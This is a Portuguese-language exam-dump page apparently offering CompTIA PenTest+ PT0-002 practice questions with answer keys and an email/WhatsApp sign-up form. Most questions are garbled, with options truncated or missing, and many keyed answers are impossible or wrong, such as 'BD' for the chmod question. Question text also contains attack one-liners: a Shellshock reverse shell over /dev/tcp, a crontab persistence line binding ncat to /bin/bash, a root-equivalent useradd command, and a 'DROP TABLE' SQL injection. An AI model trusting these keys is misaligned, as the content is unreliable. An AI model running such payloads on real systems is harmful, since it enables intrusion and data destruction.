NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Melhores exames práticos e simulações de exames reais da CompTIA PT0-002, Certificação CompTIA PenTest+ | SPOTO

Prepare-se para o sucesso na sua certificação CompTIA PenTest+ (PT0-002) com os nossos melhores exames práticos CompTIA PT0-002 e simulações de exames reais. A melhor maneira de se preparar para o exame é praticando com as últimas perguntas do exame. Nossos exames práticos e simulações de exames reais são projetados para fornecer uma experiência de exame abrangente e realista. A certificação CompTIA PenTest+ é ideal para profissionais de segurança cibernética responsáveis por testes de penetração e gerenciamento de vulnerabilidades. Com acesso a testes práticos, perguntas de amostra, dumps de exame e perguntas e respostas de exame, você estará bem equipado para demonstrar suas habilidades e conhecimentos no dia do exame. Os nossos exames simulados e o simulador de exames melhoram ainda mais a sua preparação, simulando as condições reais do exame. Utilize os nossos materiais de exame e respostas de exame para reforçar a sua compreensão e preparação para o exame PT0-002. Prepare-se com confiança e obtenha sucesso com os nossos recursos de preparação para o exame.
Faça outros exames online

Pergunta #1
Um testador de penetração está a explicar a estrutura MITRE ATT&CK ao consultor jurídico principal de uma empresa. Qual das seguintes opções o testador mais provavelmente descreveria como um benefício da estrutura?
A. Compreender as tácticas de uma intrusão de segurança pode ajudar a interrompê-las
B. Os scripts que fazem parte da estrutura podem ser importados diretamente para as ferramentas SIEM
Ver resposta
Resposta correta: D
Pergunta #2
Os resultados de um scan do Nmap são os seguintes Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST Nmap scan report for ( 10.2.1.22 ) Host is up (0.0102s latency). Não mostrado: 998 portas filtradas Estado da porta Serviço 80/tcp open http |_http-title: 80F 22% RH 1009.1MB (text/html) |_http-slowloris-check: | VULNERÁVEL: | Slowloris DoS Attack | <...> Tipo de dispositivo: bridge|general purpose Running (JUST GUESSING) : QEMU (95%) SO CPE: cpe:/a:qemu:qemu Não foram encontradas correspondências exatas de SO para o host (condições de teste não ideais)
A.
B.
C.
Ver resposta
Resposta correta: D
Pergunta #3
Um diretor de segurança da informação pretende que um técnico de testes de penetração avalie o nível de sensibilização para a segurança dos funcionários da empresa. Qual das seguintes ferramentas pode ajudar o examinador a atingir este objetivo?
A. Metasploit B
Ver resposta
Resposta correta: B
Pergunta #4
Um testador de penetração encontrou o seguinte URL válido ao efetuar uma avaliação manual de uma aplicação Web: http://www.example.com/product.php?id=123987. Qual das seguintes ferramentas automatizadas seria a melhor para usar no NEXT para tentar identificar uma vulnerabilidade neste URL?
A. Mapa SQL
B. Nessus C
Ver resposta
Resposta correta: B
Pergunta #5
Durante um trabalho de teste de penetração, um consultor efectua o reconhecimento de um cliente para identificar potenciais alvos para uma campanha de phishing. Qual das seguintes opções permitiria ao consultor recuperar rapidamente os endereços de correio eletrónico dos contactos técnicos e de faturação, sem acionar nenhuma das ferramentas de cibersegurança do cliente? (Escolha dois.)
A. Recolha de dados de sítios de redes sociais
B. Utilizar a ferramenta de pesquisa WHOIS C
C.
D.
Ver resposta
Resposta correta: C
Pergunta #6
Qual dos seguintes comandos permitirá que um testador de penetração permita que um script de shell seja executado pelo proprietário do ficheiro?
A. chmod u+x script
B. chmod u+e script
Ver resposta
Resposta correta: BD
Pergunta #7
Um testador de penetração foi capaz de reunir hashes MD5 de um servidor e decifrar os hashes facilmente com tabelas arco-íris. Qual das seguintes opções deve ser incluída como uma recomendação no relatório de correção?
A. Requisitos algorítmicos mais rigorosos
B. Controlos de acesso ao servidor C
Ver resposta
Resposta correta: B
Pergunta #8
Uma empresa está preocupada com o facto de o seu fornecedor de serviços na nuvem não estar a proteger adequadamente as VMs que alojam o seu desenvolvimento de software. As VMs estão alojadas num centro de dados com outras empresas que partilham recursos físicos. Qual dos seguintes tipos de ataque é MAIS preocupante para a empresa?
A. Inundação de dados
B. Cavalgada de sessão C
Ver resposta
Resposta correta: B
Pergunta #9
Um técnico de testes de penetração que está a efetuar uma avaliação física das práticas de segurança de uma empresa repara que a empresa não tem quaisquer trituradores no edifício de escritórios. Qual das seguintes técnicas seria a MELHOR a utilizar para obter informações confidenciais?
A. Clonagem de cartões
B. Mergulhar no caixote do lixo C
Ver resposta
Resposta correta: A
Pergunta #10
Um testador de penetração descobre um servidor Web vulnerável em 10.10.1.1. O testador edita então um script Python que envia um exploit da Web e depara-se com o seguinte código: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/ tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Qual das seguintes edições o testador deve fazer no script para determinar o contexto do utilizador no qual o servidor está a ser executado?
A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} C
Ver resposta
Resposta correta: C
Pergunta #11
Um testador de penetração recebeu um ficheiro .pcap para procurar credenciais a utilizar num compromisso. Qual das seguintes ferramentas o testador deve utilizar para abrir e ler o ficheiro .pcap?
A. Nmap B
Ver resposta
Resposta correta: C
Pergunta #12
Uma empresa contratou um técnico de testes de penetração para implementar e configurar um ponto de acesso não autorizado na rede. Qual das seguintes é a MELHOR ferramenta a ser usada para atingir esse objetivo? A.Wireshark B.Aircrack-ng C.Kismet D.Wifite
A. ma empresa contratou um técnico de testes de penetração para implementar e configurar um ponto de acesso não autorizado na rede
Ver resposta
Resposta correta: B
Pergunta #13
Qual das seguintes opções fornece uma matriz de tácticas e técnicas comuns utilizadas pelos atacantes, juntamente com as mitigações recomendadas? A.NIST SP 800-53 B.OWASP Top 10 C.Estrutura MITRE ATT&CK D.Directrizes técnicas PTES
A. ual das seguintes opções fornece uma matriz de tácticas e técnicas comuns utilizadas pelos atacantes, juntamente com as mitigações recomendadas? A
Ver resposta
Resposta correta: C
Pergunta #14
Um testador de penetração conseguiu obter acesso com êxito a uma estação de trabalho Windows no portátil de um cliente móvel. Qual das seguintes opções pode ser usada para garantir que o testador seja capaz de manter o acesso ao sistema? A.schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B.wmic startup get caption,command C.crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null D.sudo useradd -ou 0 -g 0 user
A. m testador de penetração conseguiu obter acesso com êxito a uma estação de trabalho Windows no portátil de um cliente móvel
Ver resposta
Resposta correta: C
Pergunta #15
Qual das seguintes ferramentas seria MAIS útil na recolha de informações sobre fornecedores e outras informações relevantes para a segurança de dispositivos IoT para apoiar o reconhecimento passivo?
A. Shodan
B. Nmap C
Ver resposta
Resposta correta: D
Pergunta #16
Os resultados de um scan do Nmap são os seguintes: Qual das seguintes seria a MELHOR conclusão sobre este dispositivo?
A. Este dispositivo pode estar vulnerável ao bug Heartbleed devido à forma como as transacções sobre TCP/22 tratam os pacotes de extensão heartbeat, permitindo que os atacantes obtenham informações sensíveis da memória do processo
B. O mais provável é que este dispositivo seja um gateway com serviços de gerenciamento em banda
Ver resposta
Resposta correta: C
Pergunta #17
HOTSPOT É um analista de segurança encarregado de reforçar um servidor Web. Recebeu uma lista de cargas úteis HTTP que foram marcadas como maliciosas. INSTRUÇÕES Dadas as seguintes assinaturas de ataque, determine o tipo de ataque e, em seguida, identifique a correção associada para evitar o ataque no futuro. Se, em qualquer altura, pretender voltar ao estado inicial da simulação, clique no botão Reset All (Repor tudo).
A.
Ver resposta
Resposta correta: D
Pergunta #18
Uma empresa de segurança foi contratada para efetuar uma avaliação de ameaças internas para tentar obter acesso ao servidor de recursos humanos que contém informações pessoais e dados salariais
A. Os testadores de penetração receberam uma posição inicial numa rede interna
B.
C.
D.
Ver resposta
Resposta correta: A
Pergunta #19
Um testador de penetração obteve acesso a um dispositivo de rede que tem um intervalo de IP anteriormente desconhecido numa interface. Pesquisas adicionais determinam que se trata de um túnel VPN sempre ativo para um fornecedor terceirizado. Qual das seguintes é a MELHOR ação a tomar pelo verificador de penetração?
A. Utilizar o túnel como meio de ligação a outros dispositivos internos
B. Ignorar o intervalo de IP, uma vez que está fora do âmbito
Ver resposta
Resposta correta: B
Pergunta #20
Um técnico de testes de penetração está a iniciar uma avaliação, mas apenas dispõe de informações publicamente disponíveis sobre a empresa-alvo. O cliente tem conhecimento deste exercício e está a preparar-se para o teste. Qual das seguintes opções descreve o âmbito da avaliação?
A. Ensaios em ambientes parcialmente conhecidos
B. Ensaio em ambiente conhecido C
Ver resposta
Resposta correta: A
Pergunta #21
Um testador de penetração está a tentar descobrir rapidamente anfitriões activos numa sub-rede. Qual dos seguintes comandos executará uma varredura de ping? A.nmap -sn 10.12.1.0/24 B.nmap -sV -A 10.12.1.0/24 C.nmap -Pn 10.12.1.0/24 D.nmap -sT -p- 10.12.1.0/24
A. m testador de penetração está a tentar descobrir rapidamente anfitriões activos numa sub-rede
Ver resposta
Resposta correta: D
Pergunta #22
Uma empresa que desenvolve software incorporado para a indústria automóvel contratou uma equipa de testes de penetração para avaliar a segurança dos seus produtos antes da entrega. A equipa de testes de penetração declarou a sua intenção de subcontratar uma equipa de engenharia inversa capaz de analisar binários para desenvolver explorações de prova de conceito. A empresa de software solicitou investigações adicionais sobre os antecedentes da equipa de engenharia inversa antes da aprovação do subcontrato. Qual das seguintes preocupações seria
A. A equipa de engenharia inversa pode ter um historial de venda de exploits a terceiros
B. A equipa de engenharia inversa pode utilizar fontes de informação fechadas ou outras fontes de informação não públicas para a sua análise
Ver resposta
Resposta correta: A
Pergunta #23
Um testador de penetração estava a fazer força bruta num servidor Web interno e executou um comando que produziu o seguinte resultado: No entanto, quando o testador de penetração tentou navegar no URL http://172.16.100.10:3000/profile, foi exibida uma página em branco. Qual das seguintes opções é a razão mais provável para a falta de saída?
A. A porta HTTP não está aberta na firewall
B. O testador não executou sudo antes do comando
Ver resposta
Resposta correta: A
Pergunta #24
O seguinte trecho de código Python numerado por linha está a ser utilizado em reconhecimento: Qual dos seguintes números de linha do script MAIS provavelmente contribuiu para que o script accionasse um alerta de "provável varrimento de porta" no IDS da organização?
A. Linha 01
B. Linha 02 C
Ver resposta
Resposta correta: C
Pergunta #25
Qual das seguintes opções descreve MELHOR a razão pela qual um cliente realizaria uma reunião de lições aprendidas com a equipa de testes de penetração?
A. Dar feedback sobre a estrutura do relatório e recomendar melhorias
B. Discutir os resultados e contestar quaisquer falsos positivos C
Ver resposta
Resposta correta: B
Pergunta #26
Foi contratado um técnico de testes de penetração para efetuar um teste de penetração física para obter acesso a uma sala segura no edifício de um cliente. O reconhecimento exterior identifica duas entradas, uma rede WiFi para convidados e várias câmaras de segurança ligadas à Internet. Qual das seguintes ferramentas ou técnicas seria a MELHOR para apoiar o reconhecimento adicional?
A. Deslocação em serviço
B. Shodan C
Ver resposta
Resposta correta: A
Pergunta #27
Uma empresa obteve permissão para uma análise de vulnerabilidades do seu fornecedor de serviços na nuvem e agora pretende testar a segurança dos seus dados alojados. Qual das seguintes opções o testador deve verificar PRIMEIRO para avaliar esse risco?
A. Se os dados sensíveis dos clientes estão acessíveis ao público
B. Se a ligação entre a nuvem e o cliente é segura C
Ver resposta
Resposta correta: AC
Pergunta #28
Um técnico de testes de penetração executou os seguintes comandos num servidor Windows: Qual das seguintes acções deve o técnico de testes efetuar DEPOIS de entregar o relatório final?
A. Eliminar o trabalho de lote agendado
B. Fechar a ligação da shell inversa
Ver resposta
Resposta correta: B
Pergunta #29
O diretor executivo de uma empresa criou um escritório secundário em casa e está preocupado com o facto de o serviço WiFi que está a ser utilizado ser vulnerável a um ataque. É contratado um técnico de testes de penetração para testar a segurança do router do WiFi. Qual das seguintes opções é MAIS vulnerável a um ataque de força bruta? A.WPS B.WPA2-EAP C.WPA-TKIP D.WPA2-PSK
A. diretor executivo de uma empresa criou um escritório secundário em casa e está preocupado com o facto de o serviço WiFi que está a ser utilizado ser vulnerável a um ataque
Ver resposta
Resposta correta: A
Pergunta #30
Foi dado um prazo de oito horas úteis a um técnico de testes de penetração para obter acesso ao sistema financeiro de um cliente. Qual das seguintes técnicas terá a maior probabilidade de sucesso?
A. Tentativa de seguir um empregado que se dirige ao local de trabalho do cliente
B. Deixar cair uma chave USB maliciosa com o logótipo da empresa no parque de estacionamento C
Ver resposta
Resposta correta: B
Pergunta #31
Um técnico de testes de penetração efectuou uma análise de vulnerabilidades aos servidores críticos de um cliente e encontrou o seguinte: Qual das seguintes opções seria uma recomendação para remediação?
A. Implementar um programa de formação de utilizadores
B. Implementar um plano de gestão de patches C
Ver resposta
Resposta correta: C
Pergunta #32
Um scan do Nmap mostra portas abertas em servidores Web e bases de dados. Um técnico de testes de penetração decide executar o WPScan e o SQLmap para identificar vulnerabilidades e informações adicionais sobre esses sistemas. Qual das seguintes opções o técnico de testes de penetração está a tentar realizar?
A. Descobrir potenciais actividades criminosas com base nas provas recolhidas
B. Identificar todas as vulnerabilidades no ambiente
Ver resposta
Resposta correta: A
Pergunta #33
Qual das seguintes é a vulnerabilidade MAIS comum associada aos dispositivos IoT que estão diretamente ligados à Internet?
A. Sistemas operativos não suportados
B. Suscetibilidade a ataques DDoS C
Ver resposta
Resposta correta: A
Pergunta #34
Um testador de penetração realiza uma varredura do Nmap contra um alvo e recebe os seguintes resultados: Qual das seguintes opções o testador deve usar para redirecionar as ferramentas de varredura usando a porta TCP 1080 no alvo?
A. Nessus
B. ProxyChains C
Ver resposta
Resposta correta: D
Pergunta #35
Um grande cliente pretende que um técnico de testes de penetração efectue uma pesquisa de dispositivos na sua rede que estejam ligados à Internet. O cliente está especificamente à procura de dispositivos Cisco sem requisitos de autenticação. Qual das seguintes configurações no Shodan atenderia aos requisitos do cliente?
A. "cisco-ios" "admin+1234"
B. "cisco-ios" "no-password" C
Ver resposta
Resposta correta: D
Pergunta #36
Um testador de penetração é capaz de capturar o tráfego de desafio-resposta NTLM entre um cliente e um servidor. Qual das seguintes opções pode ser feita com o pcap para obter acesso ao servidor?
A. Efetuar uma escalada vertical de privilégios
B. Reproduzir o tráfego capturado para o servidor para recriar a sessão
Ver resposta
Resposta correta: C
Pergunta #37
Qual das alternativas a seguir descreve a razão pela qual um testador de penetração executaria o comando sdelete mimikatz. * em um servidor Windows que o testador comprometeu?
A. Para remover entradas de registo de hash-cracking
B. Para remover a conta Mimikatz criada pelo testador C
Ver resposta
Resposta correta: C
Pergunta #38
Um novo cliente contratou uma empresa de testes de penetração para um contrato de um mês para várias avaliações de segurança do novo serviço do cliente. O cliente espera tornar o novo serviço disponível ao público pouco depois de a avaliação estar concluída e planeia corrigir quaisquer descobertas, exceto no caso de problemas críticos, depois de o serviço ser tornado público. O cliente pretende uma estrutura de relatório simples e não quer receber resultados diários. Qual das seguintes opções é a mais importante para o testador de penetração definir
A. Estabelecer o formato exigido pelo cliente
B. Estabelecer o limiar de risco a transmitir imediatamente ao cliente
Ver resposta
Resposta correta: B
Pergunta #39
Um testador de penetração realizou uma avaliação num servidor Web. Os registos desta sessão mostram o seguinte: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Qual dos seguintes ataques está a ser tentado? A.Clickjacking
A.
Ver resposta
Resposta correta: B
Pergunta #40
Um teste de penetração baseado na conformidade preocupa-se principalmente com
A. obtendo Pll da rede protegida
B. Contornar a proteção em dispositivos periféricos
Ver resposta
Resposta correta: C
Pergunta #41
Uma empresa de consultoria está a preencher o ROE durante a delimitação do âmbito. Qual das seguintes opções deve ser incluída na ROE?
A. Custo da avaliação
B. Distribuição de relatórios C
Ver resposta
Resposta correta: A
Pergunta #42
Foi dada uma tarefa a um testador de penetração para atacar uma série de alvos no intervalo 192.168.1.0/24, accionando o menor número possível de alarmes e contramedidas. Qual das seguintes sintaxes de scan do Nmap seria a MELHOR para atingir este objetivo?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
Ver resposta
Resposta correta: A
Pergunta #43
Uma empresa contratou um técnico de testes de penetração para efetuar um teste de engenharia social aos seus empregados. Embora o examinador não tenha encontrado os números de telefone de nenhum funcionário no sítio Web da empresa, soube que o catálogo telefónico completo foi publicado há alguns meses. Em qual dos seguintes sítios o analista de penetração deve procurar PRIMEIRO os números dos empregados?
A. Arquivo Web B
Ver resposta
Resposta correta: A
Pergunta #44
Uma empresa de software contratou um técnico de testes de penetração para efetuar um teste de penetração num servidor de base de dados. O testador recebeu uma variedade de ferramentas usadas pela política de privacidade da empresa. Qual das seguintes opções seria a MELHOR a ser usada para encontrar vulnerabilidades nesse servidor? A.OpenVAS B.Nikto C.SQLmap D.Nessus
A. ma empresa de software contratou um técnico de testes de penetração para efetuar um teste de penetração num servidor de base de dados
Ver resposta
Resposta correta: A
Pergunta #45
SIMULAÇÃO Você é um testador de penetração executando varreduras de porta em um servidor. INSTRUÇÕES Parte 1: Dada a saída, construa o comando que foi usado para gerar essa saída a partir das opções disponíveis. Parte 2: Quando o comando estiver devidamente construído, utilize o resultado para identificar os potenciais vectores de ataque que devem ser investigados. Se, em qualquer altura, pretender repor o estado inicial da simulação, clique no botão Repor tudo.
A. Ver explicação abaixo
Ver resposta
Resposta correta: C
Pergunta #46
Qual das seguintes opções deve ser atacada por um técnico de testes de penetração para obter o controlo do estado do protocolo HTTP depois de o utilizador ter iniciado sessão?
A. Comunicação HTTPS
B. Chaves públicas e privadas C
Ver resposta
Resposta correta: A

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: